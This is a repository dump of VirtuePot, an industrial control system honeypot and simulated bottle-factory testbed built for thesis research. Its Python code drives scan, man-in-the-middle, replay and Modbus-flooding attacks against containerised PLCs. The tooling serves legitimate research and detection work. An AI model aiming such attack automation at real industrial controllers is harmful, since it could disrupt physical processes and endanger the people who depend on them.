├── .gitignore
├── .gitmodules
├── README.md
├── bottlefactory
├── Dockerfile
├── docker-compose.yml
└── src
│ ├── Attacker.py
│ ├── AttackerMachine.py
│ ├── Configs.py
│ ├── DDosAgent.py
│ ├── FactorySimulation.py
│ ├── HMI1.py
│ ├── HMI2.py
│ ├── HMI3.py
│ ├── PLC1.py
│ ├── PLC2.py
│ ├── attacks
│ ├── 9.sh
│ ├── attack-logs
│ │ ├── attacker_machine_summary.csv
│ │ ├── attacker_summary.csv
│ │ ├── log-ddos.txt
│ │ ├── log-mitm-scapy.txt
│ │ ├── log-replay-scapy.txt
│ │ ├── log-scan-nmap.txt
│ │ └── log-scan-scapy.txt
│ ├── ddos.sh
│ ├── mitm-ettercap.sh
│ ├── mitm-scapy.sh
│ ├── mitm
│ │ ├── ettercap-packets.pcap
│ │ ├── mitm (copy).ecf
│ │ ├── mitm-INT-42.ecf
│ │ ├── mitm.ecf
│ │ ├── mitm.ef
│ │ └── mitm.sh
│ ├── replay-scapy.sh
│ ├── scan-ettercap.sh
│ ├── scan-nmap.sh
│ ├── scan-ping.sh
│ └── scan-scapy.sh
│ ├── ics_sim
│ ├── Device.py
│ ├── ModbusCommand.py
│ ├── ModbusPackets.py
│ ├── NetworkNode.py
│ ├── ScapyAttacker.py
│ ├── configs.py
│ ├── connectors.py
│ ├── helper.py
│ └── protocol.py
│ ├── logs
│ ├── logs-Attacker.log
│ ├── logs-AttackerMachine.log
│ ├── logs-Factory.log
│ ├── logs-HMI1.log
│ ├── logs-HMI2.log
│ ├── logs-HMI3.log
│ ├── logs-PLC1.log
│ ├── logs-PLC2.log
│ ├── snapshots_PLC1.csv
│ └── snapshots_PLC2.csv
│ ├── start.py
│ ├── start.sh
│ ├── storage
│ └── PhysicalSimulation1.sqlite
│ └── tests
│ ├── connectionTests.py
│ ├── modbusBaseTest.py
│ └── storage
│ └── PhysicalSimulation1.sqlite
├── doc
├── doc.md
├── docker.md
├── honeyd.md
├── icssim.md
├── images
│ ├── VirtuePot.png
│ └── logo.png
├── openplc.md
├── scada.md
└── zeek.md
├── honeyd
├── Dockerfile
├── docker-compose.yml
├── honeyd.conf
├── libsnap7.so
└── s7commServer
├── init.sh
├── log
├── MaliciousvsBenign.pdf
├── Modbus.pdf
├── countries_comparison.pdf
├── dest_ports.pdf
├── http_methods.pdf
├── log.ipynb
├── modbus.png
├── organization_stacked.pdf
├── organizations.pdf
├── uniqueip.pdf
├── world_cloud&vsix.pdf
├── world_cloud.pdf
└── world_vsix.pdf
├── restart_docker_containers.sh
├── scada
├── HMI.png
├── README.md
├── Water Tank.zip
├── docker-compose.yml
└── export.json
├── tcpdump_start.sh
├── tcpdump_stop.sh
├── watertank
├── README.md
├── docker-compose.yml
├── hmi
│ ├── Dockerfile
│ ├── app.py
│ ├── docker_entrypoint.sh
│ ├── gunicorn.sh
│ ├── requirements.txt
│ ├── static
│ │ ├── css
│ │ │ └── styles.css
│ │ ├── imgs
│ │ │ ├── siemens_logo.png
│ │ │ ├── tank.jpeg
│ │ │ └── user-avatar-with-check-mark.png
│ │ └── js
│ │ │ └── main.js
│ └── templates
│ │ └── index.html
├── openplc-program
│ ├── beremiz.xml
│ ├── build
│ │ ├── Config0.c
│ │ ├── Config0.h
│ │ ├── Config0.o
│ │ ├── LOCATED_VARIABLES.h
│ │ ├── POUS.c
│ │ ├── POUS.h
│ │ ├── POUS.o
│ │ ├── Res0.c
│ │ ├── Res0.o
│ │ ├── Scene_3.dynlib
│ │ ├── VARIABLES.csv
│ │ ├── beremiz.h
│ │ ├── generated_plc.st
│ │ ├── lastbuildPLC.md5
│ │ ├── plc.st
│ │ ├── plc_debugger.c
│ │ ├── plc_debugger.o
│ │ ├── plc_main.c
│ │ └── plc_main.o
│ ├── plc.xml
│ └── watertank.st
├── openplc
│ ├── Dockerfile
│ ├── PLC1.st
│ ├── Watertank.st
│ └── honeyd.conf
└── openplc_sim
│ ├── Dockerfile
│ ├── requirements.txt
│ └── tcp_modbus.py
└── zeek
├── docker-compose.yml
├── elasticsearch
├── Dockerfile
├── VERSION
├── config
│ ├── elastic
│ │ ├── elasticsearch.yml
│ │ └── log4j2.properties
│ ├── logrotate
│ └── x-pack
│ │ └── log4j2.properties
├── docker-healthcheck
├── elastic-entrypoint.sh
└── hooks
│ └── post_push
├── filebeat
├── Dockerfile
├── LATEST
├── config
│ └── filebeat.yml
├── entrypoint.sh
└── hooks
│ ├── build
│ └── post_push
├── kibana
├── Dockerfile
├── VERSION
├── config
│ ├── kibana
│ │ └── kibana.yml
│ └── logrotate
├── docker-entrypoint.sh
└── hooks
│ └── post_push
└── zeek
├── elastic
├── .dockerignore
├── Dockerfile
└── local.zeek
└── zeekctl
├── .dockerignore
├── Dockerfile
├── hooks
└── post_push
└── local.zeek
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | __pycache__
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "openplc"]
2 | path = openplc
3 | url = https://github.com/thiagoralves/OpenPLC_v2
4 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
24 |
25 |
26 |
27 | ## 📇 Abstract
28 |
29 | >Industrial Control Systems (ICS) are crucial in managing and supervising a wide range of industrial activities, including those in energy, manufacturing, and transportation. However, as
30 | these systems become increasingly interconnected and digitalized, new cybersecurity concerns emerge, rendering them vulnerable to cyberattacks. To address these issues, this thesis investigates honeypots as a proactive cybersecurity tool for protecting Industrial Control Systems. A honeypot is an effective, standard tool for studying attacks against industrial control systems
31 | and the defense methods that protect against attackers. Today the ICS industry faces a growing number of cyber threats, and as attacker capabilities improve it becomes more
32 | challenging to build a honeypot that can detect and respond to such attacks while efficiently logging interactions and capturing changes in the physical process. With this proposal we aimed to learn more about attack patterns and behavior: through the honeypot we can gather valuable information about the latest Tactics, Techniques, and Procedures used in attacks, as well as the attackers' technical knowledge and abilities. In this thesis, we present VirtuePot, a honeypot that focuses on physical interaction and on the design of honeypots that properly simulate the behavior and services of real PLCs using dynamic service simulations. This can include more advanced simulations of industrial processes, communication protocols, and command responses. We deployed the honeypot both in the cloud and on-premise at the VSIX Internet Exchange Point and collected data for 61 days. The experiment showed that the on-premise machine attracted more realistic attacks than the cloud deployment.
33 |
34 | Keywords: Cyber-physical system (CPS); Honeypot; Programmable Logic Controller (PLC); Industrial Control Systems (ICS); SCADA.
35 |
36 |
37 |
38 |
39 | ## 🧱 Architecture
40 | 
41 |
42 |
43 | ## ⚙️ Installation
44 |
45 | ### Prerequisites
46 |
47 | **OS requirements**
48 |
49 | To install Docker Engine, you need the 64-bit version of one of these Ubuntu versions:
50 |
51 | * Ubuntu Jammy 22.04 (LTS)
52 | * Ubuntu Focal 20.04 (LTS)
53 | * Ubuntu Bionic 18.04 (LTS)
54 |
55 | Docker Engine is compatible with x86_64 (or amd64), armhf, arm64, and s390x architectures.
56 |
57 | * [Install Docker](./doc/docker.md)
58 |
59 | To install the honeypot, clone this repo and run init.sh:
60 |
61 | ```bash
62 | git clone https://github.com/0xnkc/virtuepot/
63 | cd virtuepot
64 | ```
65 |
66 |
67 |
68 | ```bash
69 | chmod +x init.sh
70 |
71 | ./init.sh
72 | ```
73 |
74 | (back to top)
75 |
--------------------------------------------------------------------------------
/bottlefactory/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:20.04
2 |
3 | RUN apt-get update
4 |
5 | RUN DEBIAN_FRONTEND="noninteractive" apt-get -y install tzdata
6 |
7 | RUN apt-get update \
8 | && apt-get install -y sudo \
9 | && apt-get install -y python3 \
10 | && apt-get install -y iputils-ping \
11 | && apt-get install -y net-tools \
12 | && apt-get install -y git \
13 | && apt-get -y install nano \
14 | && apt-get install -y python3-pip \
15 | && pip install pyModbusTCP \
16 | && apt-get install -y telnet \
17 | && apt-get install -y memcached \
18 | && apt-get install -y python3-memcache \
19 | && apt-get install -y ettercap-common \
20 | && apt-get install -y unzip \
21 | && apt-get install -y nmap \
22 | && apt-get install -y curl \
23 | && apt-get install -y dos2unix
24 |
25 | # RUN curl -OL https://raw.githubusercontent.com/nikhilkc96/virtuepot/main/bottlefactory/ics-docker/src.zip
26 |
27 | # RUN unzip src.zip
28 |
29 | COPY /src /src/
30 |
31 | WORKDIR /src
32 |
33 | RUN find . -type f -exec dos2unix {} \;
34 |
35 | RUN chmod 755 *.*
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/bottlefactory/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 | pys:
4 | build: .
5 | privileged: true
6 | working_dir: /src
7 | entrypoint: ["./start.sh", "FactorySimulation.py"]
8 | container_name: pys
9 | volumes:
10 | - src:/src
11 | - "/etc/timezone:/etc/timezone:ro"
12 | - "/etc/localtime:/etc/localtime:ro"
13 | ports:
14 | - 11211:11211
15 | networks:
16 | fnet:
17 | ipv4_address: 192.168.1.31
18 |
19 | plc1:
20 | build: .
21 | privileged: true
22 | working_dir: /src
23 | entrypoint: ["./start.sh", "PLC1.py"]
24 | container_name: plc1
25 | volumes:
26 | - src:/src
27 | - "/etc/timezone:/etc/timezone:ro"
28 | - "/etc/localtime:/etc/localtime:ro"
29 | ports:
30 | - 503:502
31 | networks:
32 | wnet:
33 | ipv4_address: 192.168.0.11
34 | fnet:
35 | ipv4_address: 192.168.1.11
36 |
37 |
38 | plc2:
39 | build: .
40 | #stdin_open: true # docker run -i
41 | #tty: true
42 | privileged: true
43 | working_dir: /src
44 | entrypoint: ["./start.sh", "PLC2.py"]
45 | container_name: plc2
46 | volumes:
47 | - src:/src
48 | - "/etc/timezone:/etc/timezone:ro"
49 | - "/etc/localtime:/etc/localtime:ro"
50 | ports:
51 | - 504:502
52 | networks:
53 | wnet:
54 | ipv4_address: 192.168.0.12
55 | fnet:
56 | ipv4_address: 192.168.1.12
57 |
58 | hmi1:
59 | build: .
60 | stdin_open: true # docker run -i
61 | tty: true
62 | working_dir: /src
63 | privileged: true
64 | entrypoint: ["./start.sh", "HMI1.py"]
65 | container_name: hmi1
66 | volumes:
67 | - src:/src
68 | - "/etc/timezone:/etc/timezone:ro"
69 | - "/etc/localtime:/etc/localtime:ro"
70 | networks:
71 | wnet:
72 | ipv4_address: 192.168.0.21
73 |
74 | hmi2:
75 | build: .
76 | stdin_open: true # docker run -i
77 | tty: true
78 | privileged: true
79 | working_dir: /src
80 | entrypoint: ["./start.sh", "HMI2.py"]
81 | container_name: hmi2
82 | volumes:
83 | - src:/src
84 | networks:
85 | wnet:
86 | ipv4_address: 192.168.0.22
87 |
88 |
89 | hmi3:
90 | build: .
91 | stdin_open: true # docker run -i
92 | tty: true
93 | privileged: true
94 | working_dir: /src
95 | entrypoint: ["./start.sh", "HMI3.py"]
96 | container_name: hmi3
97 | volumes:
98 | - src:/src
99 | - "/etc/timezone:/etc/timezone:ro"
100 | - "/etc/localtime:/etc/localtime:ro"
101 | networks:
102 | wnet:
103 | ipv4_address: 192.168.0.23
104 |
105 | networks:
106 | wnet:
107 | driver: bridge
108 | name: icsnet
109 | ipam:
110 | config:
111 | - subnet: 192.168.0.0/24
112 | gateway: 192.168.0.1
113 | driver_opts:
114 | com.docker.network.bridge.name: br_icsnet
115 | fnet:
116 | driver: bridge
117 | name: phynet
118 | ipam:
119 | config:
120 | - subnet: 192.168.1.0/24
121 | gateway: 192.168.1.1
122 | driver_opts:
123 | com.docker.network.bridge.name: br_phynet
124 |
125 |
126 | volumes:
127 | src:
--------------------------------------------------------------------------------
/bottlefactory/src/Attacker.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import subprocess
4 | import sys
5 | from datetime import datetime, timedelta
6 | from time import sleep
7 |
8 | from scapy.arch import get_if_addr
9 | from scapy.config import conf
10 | from scapy.layers.inet import IP
11 | from scapy.layers.l2 import ARP, Ether
12 |
13 | from ics_sim.Device import Runnable, HMI
14 |
15 |
16 | class Attacker(Runnable):
17 | def __init__(self):
18 | Runnable.__init__(self, 'Attacker', 100)
19 |
20 | def _before_start(self):
21 | Runnable._before_start(self)
22 | self.__attack_path = './attacks'
23 | self.__log_path = os.path.join(self.__attack_path,'attack-logs')
24 |
25 | self.MAC = Ether().src
26 | self.IP = get_if_addr(conf.iface)
27 |
28 | if not os.path.exists(self.__log_path):
29 | os.makedirs(self.__log_path)
30 |
31 | self.__log_attack_summary = self.setup_logger(
32 | "attacker_summary",
33 | logging.Formatter('%(message)s'),
34 | file_dir= self.__log_path,
35 | file_ext='.csv'
36 | )
37 |
38 | self.__log_attack_summary.info("{},{},{},{},{},{},{},{}".format("attack",
39 | "startStamp",
40 | "endStamp",
41 | "startTime",
42 | "endTime",
43 | "attackerMAC",
44 | "attackerIP",
45 | "description"
46 | )
47 | )
48 |
49 | self.__attack_list = {'scan-ettercap': 'ip-scan',
50 | 'scan-ping': 'ip-scan',
51 | 'scan-nmap': 'port-scan',
52 | 'scan-scapy': 'ip-scan',
53 | 'mitm-scapy': 'mitm',
54 | 'mitm-ettercap': 'mitm',
55 | 'ddos': 'ddos',
56 | 'replay-scapy': 'replay'}
57 |
58 | self.__attack_cnt = len(self.__attack_list)
59 |
60 | pass
61 |
62 | def __get_menu_line(self, template, number, text):
63 | return template.format(
64 | self._make_text(str(number)+')', self.COLOR_BLUE),
65 | self._make_text(text, self.COLOR_YELLOW),
66 | self._make_text(str(number), self.COLOR_BLUE)
67 | )
68 |
69 | def _logic(self):
70 | menu = "\n"
71 | menu += self.__get_menu_line('{} to {} press {} \n', 0, 'clear')
72 | i = 0
73 | for attack in self.__attack_list.keys():
74 | i += 1
75 | menu += self.__get_menu_line('{} To apply the {} attack press {} \n', i , attack)
76 | self.report(menu)
77 |
78 | try:
79 | attack_name = int(input('your choice (0 to {}): '.format(self.__attack_cnt)))
80 |
81 | if attack_name == 0:
82 | os.system('clear')
83 | return
84 |
85 | if 0 < attack_name <= self.__attack_cnt:
86 | attack_name = list(self.__attack_list.keys())[attack_name-1]
87 | attack_short_name = self.__attack_list[attack_name]
88 |
89 |
90 | attack_path = os.path.join(self.__attack_path, str(attack_name) + ".sh")
91 |
92 | if not os.path.isfile(attack_path):
93 | raise ValueError('command {} does not exist'.format(attack_path))
94 |
95 | self.report('running ' + attack_path)
96 | log_file = os.path.join(self.__log_path,"log-{}.txt".format(attack_name))
97 | start_time = datetime.now()
98 | subprocess.run([attack_path, self.__log_path, log_file])
99 | end_time = datetime.now()
100 |
101 | if attack_name == 'ddos':
102 | start_time = start_time + timedelta(seconds=5)
103 |
104 | self.__log_attack_summary.info("{},{},{},{},{},{},{},{}".format(attack_short_name,
105 | start_time.timestamp(),
106 | end_time.timestamp(),
107 | start_time,
108 | end_time,
109 | self.MAC,
110 | self.IP,
111 | attack_name,
112 | )
113 | )
114 |
115 |
116 |
117 |
118 | except ValueError as e:
119 | self.report(e.__str__())
120 |
121 | except Exception as e:
122 | self.report('The input is invalid ' + e.__str__())
123 |
124 | input('press enter to continue ...')
125 |
126 |
127 | if __name__ == '__main__':
128 | attacker = Attacker()
129 | attacker.start()
130 |
--------------------------------------------------------------------------------
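The interactive menu in Attacker.py maps a numeric choice onto a script under `./attacks`. The selection step can be sketched as a pure function (a minimal sketch: the attack dictionary is copied from the source, while `resolve_attack` is a hypothetical helper name):

```python
# Attack names copied from Attacker._before_start; order matters, since the
# menu number is the 1-based position of the key in this dictionary.
ATTACK_LIST = {
    'scan-ettercap': 'ip-scan',
    'scan-ping': 'ip-scan',
    'scan-nmap': 'port-scan',
    'scan-scapy': 'ip-scan',
    'mitm-scapy': 'mitm',
    'mitm-ettercap': 'mitm',
    'ddos': 'ddos',
    'replay-scapy': 'replay',
}


def resolve_attack(choice: int) -> str:
    """Translate a 1-based menu choice into the attack script path."""
    names = list(ATTACK_LIST)
    if not 1 <= choice <= len(names):
        raise ValueError('choice out of range')
    return './attacks/{}.sh'.format(names[choice - 1])
```

This mirrors how `_logic` indexes `list(self.__attack_list.keys())` before checking that the resulting `.sh` file exists.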
/bottlefactory/src/AttackerMachine.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import random
4 | import subprocess
5 | from datetime import datetime, timedelta
6 | from time import sleep
7 |
8 | from scapy.arch import get_if_addr
9 | from scapy.config import conf
10 | from scapy.layers.l2 import Ether
11 |
12 | from ics_sim.Device import Runnable
13 |
14 |
15 | class AttackerMachine(Runnable):
16 | def __init__(self):
17 | Runnable.__init__(self, 'AttackerMachine', 100)
18 |
19 | def _before_start(self):
20 | Runnable._before_start(self)
21 |
22 | self.__attack_path = './attacks'
23 | self.__log_path = os.path.join(self.__attack_path, 'attack-logs')
24 |
25 | self.MAC = Ether().src
26 | self.IP = get_if_addr(conf.iface)
27 |
28 | if not os.path.exists(self.__log_path):
29 | os.makedirs(self.__log_path)
30 |
31 | self.__log_attack_summary = self.setup_logger(
32 | "attacker_machine_summary",
33 | logging.Formatter('%(message)s'),
34 | file_dir=self.__log_path,
35 | file_ext='.csv'
36 | )
37 |
38 | self.__log_attack_summary.info("{},{},{},{},{},{},{},{}".format("attack",
39 | "startStamp",
40 | "endStamp",
41 | "startTime",
42 | "endTime",
43 | "attackerMAC",
44 | "attackerIP",
45 | "description"
46 | )
47 | )
48 |
49 | self.__attack_list = {'scan-ettercap': 'ip-scan',
50 | 'scan-ping': 'ip-scan',
51 | 'scan-nmap': 'port-scan',
52 | 'scan-scapy': 'ip-scan',
53 | 'mitm-scapy': 'mitm',
54 | 'mitm-ettercap': 'mitm',
55 | 'ddos': 'ddos',
56 | 'replay-scapy': 'replay'}
57 |
58 | self.__attack_scenario = []
59 | self.__attack_scenario += ['scan-ettercap'] * 0 # this should be 0, cannot automate
60 | self.__attack_scenario += ['scan-ping'] * 0
61 | self.__attack_scenario += ['scan-nmap'] * 16
62 | self.__attack_scenario += ['scan-scapy'] * 21
63 | self.__attack_scenario += ['mitm-scapy'] * 14
64 | self.__attack_scenario += ['mitm-ettercap'] * 0
65 | self.__attack_scenario += ['ddos'] * 7
66 | self.__attack_scenario += ['replay-scapy'] * 7
67 |
68 | random.shuffle(self.__attack_scenario)
69 |
70 | self.__attack_cnt = len(self.__attack_list)
71 |
72 | def _logic(self):
73 | while True:
74 | response = input("Do you want to start attacks? \n")
75 | response = response.lower()
76 | if response == 'y' or response == 'yes':
77 | self._set_clear_scr(False)
78 | break
79 | else:
80 | continue
81 |
82 | self.report('Attacker Machine starting to apply {} attacks'.format(len(self.__attack_scenario)))
83 | self.__status_board = {}
84 |
85 | for attack_name in self.__attack_scenario:
86 | try:
87 | attack_short_name = self.__attack_list[attack_name]
88 | attack_path = os.path.join(self.__attack_path, str(attack_name) + ".sh")
89 |
90 | if attack_name not in self.__status_board:
91 | self.__status_board[attack_name] = 0
92 | self.__status_board[attack_name] += 1
93 |
94 | if not os.path.isfile(attack_path):
95 | raise ValueError('command {} does not exist'.format(attack_path))
96 |
97 | self.report(self._make_text('running ' + attack_path, self.COLOR_YELLOW))
98 | log_file = os.path.join(self.__log_path, "log-{}.txt".format(attack_name))
99 | start_time = datetime.now()
100 | subprocess.run([attack_path, self.__log_path, log_file])
101 | end_time = datetime.now()
102 |
103 | if attack_name == 'ddos':
104 | start_time = start_time + timedelta(seconds=5)
105 |
106 | self.__log_attack_summary.info("{},{},{},{},{},{},{},{}".format(attack_short_name,
107 | start_time.timestamp(),
108 | end_time.timestamp(),
109 | start_time,
110 | end_time,
111 | self.MAC,
112 | self.IP,
113 | attack_name,
114 | )
115 | )
116 | for attack in self.__status_board.keys():
117 | text = '{}: applied {} times'.format(attack, self.__status_board[attack])
118 | self.report(self._make_text(text, self.COLOR_GREEN))
119 |
120 | self.report('waiting 40 seconds')
121 | sleep(40)
122 |
123 | except ValueError as e:
124 | self.report(e.__str__())
125 |
126 | except Exception as e:
127 | self.report('The input is invalid ' + e.__str__())
128 |
129 | input('press enter to continue ...')
130 |
131 |
132 | if __name__ == '__main__':
133 | attackerMachine = AttackerMachine()
134 | attackerMachine.start()
135 |
--------------------------------------------------------------------------------
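AttackerMachine builds its run order by repeating each attack name according to a fixed weight and then shuffling the list. A minimal sketch of that step (the weights are copied from `_before_start`; `build_scenario` and the `seed` parameter are hypothetical additions for reproducibility):

```python
import random

# Non-zero weights copied from AttackerMachine._before_start.
WEIGHTS = {
    'scan-nmap': 16,
    'scan-scapy': 21,
    'mitm-scapy': 14,
    'ddos': 7,
    'replay-scapy': 7,
}


def build_scenario(weights, seed=None):
    """Repeat each attack name by its weight, then shuffle the run order."""
    scenario = [name for name, count in weights.items() for _ in range(count)]
    random.Random(seed).shuffle(scenario)
    return scenario
```

With these weights the machine runs 65 attacks per scenario, which matches the shuffled `__attack_scenario` list in the source.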
/bottlefactory/src/Configs.py:
--------------------------------------------------------------------------------
1 | class SimulationConfig:
2 | # Constants
3 | EXECUTION_MODE_LOCAL = 'local'
4 | EXECUTION_MODE_DOCKER = 'docker'
5 | EXECUTION_MODE_GNS3 = 'gns3'
6 |
7 | # configurable
8 | EXECUTION_MODE = EXECUTION_MODE_DOCKER
9 |
10 |
11 |
12 | class PHYSICS:
13 | TANK_LEVEL_CAPACITY = 3 # Liter
14 | TANK_MAX_LEVEL = 10
15 | TANK_INPUT_FLOW_RATE = 0.0002 # Liter/millisecond
16 | TANK_OUTPUT_FLOW_RATE = 0.0001 # Liter/millisecond
17 |
18 | BOTTLE_LEVEL_CAPACITY = 0.75 # Liter
19 | BOTTLE_MAX_LEVEL = 2
20 | BOTTLE_DISTANCE = 20 # Centimeter
21 |
22 | CONVEYOR_BELT_SPEED = 0.005 # Centimeter/millisecond
23 |
24 |
25 | class TAG:
26 | TAG_TANK_INPUT_VALVE_STATUS = 'tank_input_valve_status'
27 | TAG_TANK_INPUT_VALVE_MODE = 'tank_input_valve_mode'
28 |
29 | TAG_TANK_LEVEL_VALUE = 'tank_level_value'
30 | TAG_TANK_LEVEL_MAX = 'tank_level_max'
31 | TAG_TANK_LEVEL_MIN = 'tank_level_min'
32 |
33 | TAG_TANK_OUTPUT_VALVE_STATUS = 'tank_output_valve_status'
34 | TAG_TANK_OUTPUT_VALVE_MODE = 'tank_output_valve_mode'
35 |
36 | TAG_TANK_OUTPUT_FLOW_VALUE = 'tank_output_flow_value'
37 |
38 | TAG_CONVEYOR_BELT_ENGINE_STATUS= 'conveyor_belt_engine_status'
39 | TAG_CONVEYOR_BELT_ENGINE_MODE = 'conveyor_belt_engine_mode'
40 |
41 | TAG_BOTTLE_LEVEL_VALUE = 'bottle_level_value'
42 | TAG_BOTTLE_LEVEL_MAX = 'bottle_level_max'
43 |
44 | TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE = 'bottle_distance_to_filler_value'
45 |
46 | TAG_LIST = {
47 | # tag_name: {id: tag_id, plc: PLC number, type: input/output, fault (inputs only), default}
48 | TAG_TANK_INPUT_VALVE_STATUS: {'id': 0, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 1},
49 | TAG_TANK_INPUT_VALVE_MODE: {'id': 1, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 3},
50 |
51 | TAG_TANK_LEVEL_VALUE: {'id': 2, 'plc': 1, 'type': 'input', 'fault': 0.0, 'default': 5.8},
52 | TAG_TANK_LEVEL_MIN: {'id': 3, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 3},
53 | TAG_TANK_LEVEL_MAX: {'id': 4, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 7},
54 |
55 |
56 | TAG_TANK_OUTPUT_VALVE_STATUS: {'id': 5, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 0},
57 | TAG_TANK_OUTPUT_VALVE_MODE: {'id': 6, 'plc': 1, 'type': 'output', 'fault': 0.0, 'default': 3},
58 |
59 | TAG_TANK_OUTPUT_FLOW_VALUE: {'id': 7, 'plc': 1, 'type': 'input', 'fault': 0.0, 'default': 0},
60 |
61 | TAG_CONVEYOR_BELT_ENGINE_STATUS: {'id': 8, 'plc': 2, 'type': 'output', 'fault': 0.0, 'default': 0},
62 | TAG_CONVEYOR_BELT_ENGINE_MODE: {'id': 9, 'plc': 2, 'type': 'output', 'fault': 0.0, 'default': 3},
63 |
64 | TAG_BOTTLE_LEVEL_VALUE: {'id': 10, 'plc': 2, 'type': 'input', 'fault': 0.0, 'default': 0},
65 | TAG_BOTTLE_LEVEL_MAX: {'id': 11, 'plc': 2, 'type': 'output', 'fault': 0.0, 'default': 1.8},
66 |
67 | TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE: {'id': 12, 'plc': 2, 'type': 'input', 'fault': 0.0, 'default': 0},
68 | }
69 |
70 |
71 | class Controllers:
72 | PLC_CONFIG = {
73 | SimulationConfig.EXECUTION_MODE_DOCKER: {
74 | 1: {
75 | 'name': 'PLC1',
76 | 'ip': '192.168.0.11',
77 | 'port': 502,
78 | 'protocol': 'ModbusWriteRequest-TCP'
79 | },
80 | 2: {
81 | 'name': 'PLC2',
82 | 'ip': '192.168.0.12',
83 | 'port': 502,
84 | 'protocol': 'ModbusWriteRequest-TCP'
85 | },
86 | },
87 | SimulationConfig.EXECUTION_MODE_GNS3: {
88 | 1: {
89 | 'name': 'PLC1',
90 | 'ip': '192.168.0.11',
91 | 'port': 502,
92 | 'protocol': 'ModbusWriteRequest-TCP'
93 | },
94 | 2: {
95 | 'name': 'PLC2',
96 | 'ip': '192.168.0.12',
97 | 'port': 502,
98 | 'protocol': 'ModbusWriteRequest-TCP'
99 | },
100 | },
101 | SimulationConfig.EXECUTION_MODE_LOCAL: {
102 | 1: {
103 | 'name': 'PLC1',
104 | 'ip': '127.0.0.1',
105 | 'port': 5502,
106 | 'protocol': 'ModbusWriteRequest-TCP'
107 | },
108 | 2: {
109 | 'name': 'PLC2',
110 | 'ip': '127.0.0.1',
111 | 'port': 5503,
112 | 'protocol': 'ModbusWriteRequest-TCP'
113 | },
114 | }
115 | }
116 |
117 | PLCs = PLC_CONFIG[SimulationConfig.EXECUTION_MODE]
118 |
119 |
120 | class Connection:
121 | SQLITE_CONNECTION = {
122 | 'type': 'sqlite',
123 | 'path': 'storage/PhysicalSimulation1.sqlite',
124 | 'name': 'fp_table',
125 | }
126 | MEMCACHE_DOCKER_CONNECTION = {
127 | 'type': 'memcache',
128 | 'path': '192.168.1.31:11211',
129 | 'name': 'fp_table',
130 | }
131 | MEMCACHE_LOCAL_CONNECTION = {
132 | 'type': 'memcache',
133 | 'path': '127.0.0.1:11211',
134 | 'name': 'fp_table',
135 | }
136 | File_CONNECTION = {
137 | 'type': 'file',
138 | 'path': 'storage/sensors_actuators.json',
139 | 'name': 'fake_name',
140 | }
141 |
142 | CONNECTION_CONFIG = {
143 | SimulationConfig.EXECUTION_MODE_GNS3: MEMCACHE_DOCKER_CONNECTION,
144 | SimulationConfig.EXECUTION_MODE_DOCKER: SQLITE_CONNECTION,
145 | SimulationConfig.EXECUTION_MODE_LOCAL: SQLITE_CONNECTION
146 | }
147 | CONNECTION = CONNECTION_CONFIG[SimulationConfig.EXECUTION_MODE]
148 |
149 |
--------------------------------------------------------------------------------
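`TAG.TAG_LIST` in Configs.py assigns every process tag a register id and an owning PLC. Grouping tags by controller can be sketched as follows (a minimal sketch: the dictionary below is a small excerpt of `TAG_LIST`, and `tags_for_plc` is a hypothetical helper, not part of the source):

```python
# Excerpt of Configs.TAG.TAG_LIST (fault/default fields omitted for brevity).
TAG_LIST = {
    'tank_input_valve_status':     {'id': 0,  'plc': 1, 'type': 'output'},
    'tank_level_value':            {'id': 2,  'plc': 1, 'type': 'input'},
    'conveyor_belt_engine_status': {'id': 8,  'plc': 2, 'type': 'output'},
    'bottle_level_value':          {'id': 10, 'plc': 2, 'type': 'input'},
}


def tags_for_plc(tag_list, plc):
    """Return the tag names served by the given PLC number, sorted."""
    return sorted(name for name, spec in tag_list.items() if spec['plc'] == plc)
```

In the full configuration, PLC1 owns the tank tags (ids 0-7) and PLC2 owns the conveyor and bottle tags (ids 8-12), which is why the HMIs route Modbus requests through `Controllers.PLCs` by tag.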
/bottlefactory/src/DDosAgent.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import random
4 | import sys
5 | from datetime import datetime
6 | from time import sleep
7 |
8 | from ics_sim.Device import HMI
9 | from Configs import TAG, Controllers
10 |
11 |
12 | class DDosAgent(HMI):
13 | max = 0
14 |
15 | def __init__(self, name, is_first):
16 | self.is_first = is_first
17 | super().__init__(name, TAG.TAG_LIST, Controllers.PLCs, 1)
18 | self.__counter = 0
19 | self.__target = random.choice(list(TAG.TAG_LIST.keys()))
20 | self.chunk = 10
21 |
22 |
23 | def _before_start(self):
24 | self._set_clear_scr(False)
25 | sleep(5)
26 |
27 | def _logic(self):
28 |
29 | try:
30 | for i in range(self.chunk):
31 | value = self._receive(self.__target)
32 | self.__counter += self.chunk
33 |
34 | except Exception as e:
35 | self.report('{} got exception on read request number {}'.format(self.name(), self.__counter), logging.INFO)
36 |
37 | def _post_logic_update(self):
38 | latency = self.get_logic_execution_time() / self.chunk
39 | if latency > DDosAgent.max:
40 | DDosAgent.max = latency
41 | #self.report('Max seen latency reached to {}'.format(DDosAgent.max), logging.INFO)
42 | if self.__counter % 1000 < self.chunk:
43 | self.report('{} sent {} read requests for {}'.format(self.name(), self.__counter, self.__target), logging.INFO)
44 |
45 | def _initialize_logger(self):
46 | if self.is_first:
47 | self._logger = self.setup_logger(
48 | "log-ddos",
49 | logging.Formatter('%(asctime)s %(levelname)s %(message)s'),
50 | file_dir= "./attacks/attack-logs",
51 | file_ext='.txt',
52 | write_mode='a',
53 | level=logging.INFO
54 | )
55 | else:
56 | self._logger = logging.getLogger('log-ddos')
57 |
58 | def _before_stop(self):
